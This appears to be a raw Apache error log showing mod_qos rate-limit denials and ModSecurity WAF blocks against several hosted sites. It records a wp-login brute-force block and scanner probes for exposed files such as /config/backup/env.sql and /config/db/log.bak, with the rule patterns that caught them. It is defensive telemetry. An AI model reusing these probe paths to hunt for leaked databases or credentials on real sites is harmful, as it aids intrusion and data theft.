[Tue May 26 19:54:33.903095 2026] [qos:error] [pid 93576:tid 93723] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIWDRMqfxdEDkoszRggAAAAs
[Tue May 26 19:54:33.903738 2026] [qos:error] [pid 86490:tid 86668] [client 45.148.10.120:56898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIVZMwN0DpLVWo6LA6QAAALU
[Tue May 26 19:54:33.938274 2026] [security2:error] [pid 93868:tid 94228] [remote 121.200.216.55:45096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWtIUqK9k_ZUB2Vp25JjQAB7W4"]
[Tue May 26 19:54:34.006549 2026] [security2:error] [pid 86490:tid 86688] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/backup/env.sql"] [unique_id "ahWtIlZMwN0DpLVWo6LA6gAAAMk"]
[Tue May 26 19:54:34.029380 2026] [qos:error] [pid 86490:tid 86747] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIlZMwN0DpLVWo6LA6wAAAQQ
[Tue May 26 19:54:34.032238 2026] [qos:error] [pid 86490:tid 86734] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIlZMwN0DpLVWo6LA7AAAAPc
[Tue May 26 19:54:34.038256 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIlZMwN0DpLVWo6LA7QAAAN0
[Tue May 26 19:54:34.043792 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtImDRMqfxdEDkoszRgwAAADs
[Tue May 26 19:54:34.047727 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:56888] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIlZMwN0DpLVWo6LA7gAAAIY
[Tue May 26 19:54:34.050774 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIlZMwN0DpLVWo6LA7wAAAMQ
[Tue May 26 19:54:34.052165 2026] [qos:error] [pid 86490:tid 86654] [client 45.148.10.120:56898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIlZMwN0DpLVWo6LA8AAAAKc
[Tue May 26 19:54:34.053179 2026] [qos:error] [pid 86490:tid 86697] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIlZMwN0DpLVWo6LA8QAAANI
[Tue May 26 19:54:34.054670 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtImDRMqfxdEDkoszRhAAAADI
[Tue May 26 19:54:34.180282 2026] [qos:error] [pid 86490:tid 86647] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIlZMwN0DpLVWo6LA8wAAAKA
[Tue May 26 19:54:34.186414 2026] [qos:error] [pid 86490:tid 86622] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIlZMwN0DpLVWo6LA9AAAAIc
[Tue May 26 19:54:34.188220 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIlZMwN0DpLVWo6LA9QAAAOA
[Tue May 26 19:54:34.194403 2026] [qos:error] [pid 93576:tid 93730] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtImDRMqfxdEDkoszRhQAAABI
[Tue May 26 19:54:34.198178 2026] [qos:error] [pid 86490:tid 86742] [client 45.148.10.120:56888] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIlZMwN0DpLVWo6LA9gAAAP8
[Tue May 26 19:54:34.201451 2026] [qos:error] [pid 86490:tid 86640] [client 45.148.10.120:56898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIlZMwN0DpLVWo6LA9wAAAJk
[Tue May 26 19:54:34.203088 2026] [qos:error] [pid 86490:tid 86730] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIlZMwN0DpLVWo6LA-AAAAPM
[Tue May 26 19:54:34.203335 2026] [qos:error] [pid 86490:tid 86673] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIlZMwN0DpLVWo6LA-QAAALo
[Tue May 26 19:54:34.206234 2026] [qos:error] [pid 93576:tid 93727] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtImDRMqfxdEDkoszRhgAAAA8
[Tue May 26 19:54:34.280635 2026] [security2:error] [pid 86490:tid 86709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LAMwAAAN4"]
[Tue May 26 19:54:34.281442 2026] [security2:error] [pid 93868:tid 94385] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIEqK9k_ZUB2Vp25JWAAAAg4"]
[Tue May 26 19:54:34.284713 2026] [security2:error] [pid 93576:tid 93803] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIGDRMqfxdEDkoszRQgAAAFs"]
[Tue May 26 19:54:34.287123 2026] [security2:error] [pid 86490:tid 86718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LANAAAAOc"]
[Tue May 26 19:54:34.290568 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIGDRMqfxdEDkoszRPQAAAAM"]
[Tue May 26 19:54:34.294090 2026] [security2:error] [pid 93868:tid 94331] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIEqK9k_ZUB2Vp25JXAAAAdg"]
[Tue May 26 19:54:34.295221 2026] [security2:error] [pid 86490:tid 86670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LAMgAAALc"]
[Tue May 26 19:54:34.304032 2026] [security2:error] [pid 86490:tid 86669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LAQwAAALY"]
[Tue May 26 19:54:34.309393 2026] [security2:error] [pid 86490:tid 86701] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LATgAAANY"]
[Tue May 26 19:54:34.312058 2026] [security2:error] [pid 86490:tid 86735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LAOwAAAPg"]
[Tue May 26 19:54:34.329929 2026] [security2:error] [pid 86490:tid 86663] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LATQAAALA"]
[Tue May 26 19:54:34.341780 2026] [security2:error] [pid 86490:tid 86620] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LALQAAAIU"]
[Tue May 26 19:54:34.346309 2026] [security2:error] [pid 86490:tid 86688] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/db/log.bak"] [unique_id "ahWtIlZMwN0DpLVWo6LA_QAAAMk"]
[Tue May 26 19:54:34.349191 2026] [security2:error] [pid 86490:tid 86623] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIVZMwN0DpLVWo6LAmQAAAIg"]
[Tue May 26 19:54:34.352268 2026] [security2:error] [pid 86490:tid 86655] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LAPQAAAKg"]
[Tue May 26 19:54:34.356023 2026] [security2:error] [pid 93868:tid 94335] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIEqK9k_ZUB2Vp25JXwAAAdw"]
[Tue May 26 19:54:34.361150 2026] [security2:error] [pid 86490:tid 86671] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LAMQAAALg"]
[Tue May 26 19:54:34.361151 2026] [security2:error] [pid 93868:tid 94342] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIEqK9k_ZUB2Vp25JXgAAAeM"]
[Tue May 26 19:54:34.364215 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIGDRMqfxdEDkoszRVAAAAGc"]
[Tue May 26 19:54:34.364583 2026] [security2:error] [pid 93576:tid 93787] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIGDRMqfxdEDkoszRUAAAAEs"]
[Tue May 26 19:54:34.374760 2026] [security2:error] [pid 86490:tid 86721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LAYwAAAOo"]
[Tue May 26 19:54:34.374798 2026] [security2:error] [pid 86490:tid 86632] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LAQQAAAJE"]
[Tue May 26 19:54:34.375493 2026] [security2:error] [pid 86490:tid 86705] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIVZMwN0DpLVWo6LAqgAAANo"]
[Tue May 26 19:54:34.384187 2026] [security2:error] [pid 86490:tid 86684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LATAAAAMU"]
[Tue May 26 19:54:34.400307 2026] [security2:error] [pid 93868:tid 94328] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIEqK9k_ZUB2Vp25JXQAAAdU"]
[Tue May 26 19:54:34.407596 2026] [security2:error] [pid 86490:tid 86736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIVZMwN0DpLVWo6LAlwAAAPk"]
[Tue May 26 19:54:34.414316 2026] [security2:error] [pid 86490:tid 86665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIVZMwN0DpLVWo6LApQAAALI"]
[Tue May 26 19:54:34.421025 2026] [security2:error] [pid 93868:tid 94340] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIUqK9k_ZUB2Vp25JdgAAAeE"]
[Tue May 26 19:54:34.423022 2026] [security2:error] [pid 86490:tid 86649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIFZMwN0DpLVWo6LANwAAAKI"]
[Tue May 26 19:54:34.440526 2026] [security2:error] [pid 86490:tid 86652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIVZMwN0DpLVWo6LApwAAAKU"]
[Tue May 26 19:54:34.445430 2026] [security2:error] [pid 86490:tid 86662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIVZMwN0DpLVWo6LAnAAAAK8"]
[Tue May 26 19:54:34.459539 2026] [security2:error] [pid 93576:tid 93838] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIWDRMqfxdEDkoszRbAAAAH4"]
[Tue May 26 19:54:34.459767 2026] [security2:error] [pid 93868:tid 94294] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIUqK9k_ZUB2Vp25JdAAAAbM"]
[Tue May 26 19:54:34.754556 2026] [qos:error] [pid 86490:tid 86678] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIlZMwN0DpLVWo6LBMwAAAL8
[Tue May 26 19:54:34.759502 2026] [qos:error] [pid 86490:tid 86634] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIlZMwN0DpLVWo6LBNAAAAJM
[Tue May 26 19:54:34.795664 2026] [qos:error] [pid 86490:tid 86730] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIlZMwN0DpLVWo6LBNQAAAPM
[Tue May 26 19:54:34.808849 2026] [qos:error] [pid 86490:tid 86644] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIlZMwN0DpLVWo6LBOAAAAJ0
[Tue May 26 19:54:34.909307 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtIlZMwN0DpLVWo6LBPQAAAKg
[Tue May 26 19:54:35.155432 2026] [qos:error] [pid 86490:tid 86734] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtI1ZMwN0DpLVWo6LBPwAAAPc
[Tue May 26 19:54:35.160932 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:35270] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtI2DRMqfxdEDkoszRmQAAAAc
[Tue May 26 19:54:35.161129 2026] [qos:error] [pid 86490:tid 86674] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtI1ZMwN0DpLVWo6LBQAAAALs
[Tue May 26 19:54:35.165529 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtI1ZMwN0DpLVWo6LBQQAAAN0
[Tue May 26 19:54:35.201493 2026] [qos:error] [pid 93868:tid 94300] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtI0qK9k_ZUB2Vp25JtQAAAbk
[Tue May 26 19:54:35.211068 2026] [qos:error] [pid 93868:tid 94290] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtI0qK9k_ZUB2Vp25JtgAAAa8
[Tue May 26 19:54:35.213068 2026] [qos:error] [pid 86490:tid 86676] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtI1ZMwN0DpLVWo6LBQwAAAL0
[Tue May 26 19:54:35.261713 2026] [qos:error] [pid 86490:tid 86717] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtI1ZMwN0DpLVWo6LBRQAAAOY
[Tue May 26 19:54:35.262819 2026] [qos:error] [pid 86490:tid 86717] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtI1ZMwN0DpLVWo6LBRgAAAOY
[Tue May 26 19:54:35.276594 2026] [security2:error] [pid 93868:tid 94361] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIUqK9k_ZUB2Vp25JewAAAfY"]
[Tue May 26 19:54:35.283492 2026] [security2:error] [pid 93868:tid 94356] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIUqK9k_ZUB2Vp25JeQAAAfE"]
[Tue May 26 19:54:35.291836 2026] [security2:error] [pid 93868:tid 94291] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIUqK9k_ZUB2Vp25JgAAAAbA"]
[Tue May 26 19:54:35.293281 2026] [security2:error] [pid 93868:tid 94360] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIUqK9k_ZUB2Vp25JfQAAAfU"]
[Tue May 26 19:54:35.293906 2026] [security2:error] [pid 86490:tid 86727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIVZMwN0DpLVWo6LAuAAAAPA"]
[Tue May 26 19:54:35.297231 2026] [security2:error] [pid 86490:tid 86627] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIVZMwN0DpLVWo6LAowAAAIw"]
[Tue May 26 19:54:35.299862 2026] [security2:error] [pid 86490:tid 86732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIVZMwN0DpLVWo6LAtAAAAPU"]
[Tue May 26 19:54:35.303823 2026] [security2:error] [pid 93868:tid 94345] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIUqK9k_ZUB2Vp25JiwAAAeY"]
[Tue May 26 19:54:35.306676 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIWDRMqfxdEDkoszRdQAAAA0"]
[Tue May 26 19:54:35.310042 2026] [security2:error] [pid 86490:tid 86679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIlZMwN0DpLVWo6LBBwAAAMA"]
[Tue May 26 19:54:35.310524 2026] [security2:error] [pid 86490:tid 86687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIVZMwN0DpLVWo6LAtQAAAMg"]
[Tue May 26 19:54:35.316298 2026] [security2:error] [pid 86490:tid 86639] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIVZMwN0DpLVWo6LAswAAAJg"]
[Tue May 26 19:54:35.332828 2026] [security2:error] [pid 93868:tid 94327] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIUqK9k_ZUB2Vp25JiAAAAdQ"]
[Tue May 26 19:54:35.340725 2026] [security2:error] [pid 86490:tid 86670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtIlZMwN0DpLVWo6LBBgAAALc"]
